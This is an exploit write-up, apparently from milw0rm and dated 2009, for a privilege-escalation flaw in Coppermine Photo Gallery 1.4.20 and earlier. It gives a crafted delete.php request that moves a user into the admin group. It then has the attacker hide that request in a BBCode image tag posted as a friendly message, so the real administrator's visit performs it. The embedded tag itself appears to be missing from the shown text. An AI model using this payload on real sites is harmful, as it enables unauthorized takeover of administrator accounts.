| Coppermine Photo Gallery <= 1.4.20 (BBCode IMG) Privilege Escalation PoC |
| by Juri Gianni aka yeat - staker[at]hotmail[dot]it |
| http://coppermine-gallery.net |
| Don't add me on msn messenger. |
| This vulnerability can be named as "bbcode img tag script injection" |
| Proof of Concept (an example,to understand it) |
URL: http://[host]/[path]/delete.php?id=u[ID]&u[ID]=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no
| Modify [ID] with your user id. |
| Go http://[host]/[path]/displayimage.php?album=random&pos=[album id] |
Insert the below code into a new message
hey admin,nice web site :)
| The fake image doesn't show errors,you'll see "hey admin,nice web site" |
| You'll become admin when the real admin will visit the page |
# milw0rm.com [2009-02-26]